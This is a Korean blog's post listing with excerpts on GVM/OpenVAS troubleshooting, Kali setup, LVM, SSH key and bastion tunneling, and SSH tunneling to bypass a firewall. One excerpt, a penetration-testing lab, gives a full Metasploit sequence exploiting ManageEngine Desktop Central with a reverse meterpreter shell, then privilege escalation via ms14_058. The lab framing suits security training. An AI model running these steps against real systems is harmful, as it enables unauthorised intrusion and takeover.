본문 바로가기

전체 글118

GVM/OpenVAS 설치 트러블슈팅 기록 : Scan Configs 안 뜸 1. 최초 증상gvm/_gvm 계정이 동시에 존재해 /var/lib/gvm, /var/lib/openvas 등 소유권 불일치로 Permission denied 반복SCAP 피드 다운로드 중 rsync connection reset 반복 2. 1차 조치 (부분 초기화)find /var/lib/gvm -not -user gvm -exec chown gvm:gvm {} \; 로 소유권 통일 + gvmd.service의 User/Group을 gvm으로 변경 → 임시 해결SCAP sync 문제는 근본 해결 안 됨 → 관련 패키지 전체 purge 후 재설치로 방향 전환재설치 후 설치 자체는 성공(installation is OK)했지만, 웹 UI Scan Configs가 0개로 비는 문제 발생 3. 완전 초기화 (.. 2026. 9. 5.
모의해킹 : 권한 상승 에스컬레이션 (Priviliage escalation) -Metasploit Window- 실습 목표 1. desktop engine central 취약점 공격 후 shell 따기msfconsoleuse exploit/windows/http/manageengine_connectionid_writeset payload windows/meterpreter/reverse_tcpshow options set rhost 10.0.0.41set rport 8022run 2. 권한 상승하기 (escalation)psmigrate 3640background use exploit/windows/local/ms14_058_track_popup_menuset payload windows/x64.meterpreter/reverse_tcpset target 1set session 1run 3. 확인 2026. 8. 31.
모의해킹 : 실습 환경 세팅 - Kali Linux - + 내용과는 상관없지만 기록해야 할 것 마우스 드래그가 안될 때 : 아무 폴더나 파일 선택 후 F2를 눌러 이름 변경 상태로 만든 뒤 ESC 키를 누르면 됨 1. iso 파일 준비하기 2. vmware에서 하드웨어 세팅 하기 3. OOBE 설정 *** DHCP 설정에서 취소 누르기*** ***도메인 이름은 패스*** 부트로더 "예" -> sda -> bamtoll , It1 -> 터미널 -> sudo su - It1 -> passwd It1 -> reboot 4. root 계정 비번 걸기 5. 한글 설정 apt install -y fonts-nanum fcitx5 fcitx5-hangulreboot ***재부팅 하면 뜨는 창에서 꼭 "예전 이름 유지"로 체크해야 함*** 2026. 8. 30.
SSH 터널링으로 방화벽 우회하기 실습 1. SSH란?신뢰할 수 없는 네트워크 상에서 두 시스템 간에 암호화된 통신을 제공하기 위해 설계된 프로토콜이자 클라이언트 프로그램이다. 원격 로그인과 명령 실행뿐 아니라, X11 연결이나 임의의 TCP 포트도 이 암호화된 채널을 통해 포워딩할 수 있다. 참고 -> https://www.openssh.org/manual.html https://man.openbsd.org/ssh OpenSSH: Manual PagesWeb manual pages are available from OpenBSD for the following commands. These manual pages reflect the latest development release of OpenSSH. ssh(1) — Th.. 2026. 8. 30.
Rocky Linux 9 : LVM 구현 실습 목표1. 디스크 파티셔닝fdisk /dev/sdan -> 디폴트 1 -> 디폴트 2048 -> 디폴트 사이즈 -> 타입 t -> linux LVM 8e -> 확인 p -> 저장 w 2. PV -> VG -> LV -> File System pvcreate /dev/sda1pvscanvgcreate jyjang /dev/sda1vgdisplaylvcreate -L 1G -n jyjang1 jyjangmkfs.xfs /dev/jyjang/jyjang1lvcreate -L 2G -n jyjang2 jyjangmkfs.ext4 /dev/jyjang/jyjang2lvcreate -l (vgdisplay에서 확인한 남는 용량) -n jyjang3 jyjangmkfs.ext3 /dev/jyjang/jyjang3.. 2026. 8. 24.
MobaXterm, Xshell SSH 터널링 1. SSH 키 생성ssh-keygen -b 2048 -m pem -t rsa -q -N "" 2. 베스천 호스트 서버와 내부망 서버에 공개키 저장scp .ssh\id_rsa.pub root@10.0.0.11:/root/.ssh/authorized_keysssh root@10.0.0.11scp .ssh/authorized_keys root@172.16.0.11:/root/.ssh/scp .ssh/authorized_keys root@172.16.0.12:/root/.ssh/scp .ssh/authorized_keys root@172.16.0.13:/root/.ssh/ 3. Mobaxterm 3-1. 최종 목적지 서버 개인키로 인증 3-2. 중간 경유 Bastion Host 서버 개인키로 인증 - .. 2026. 8. 24.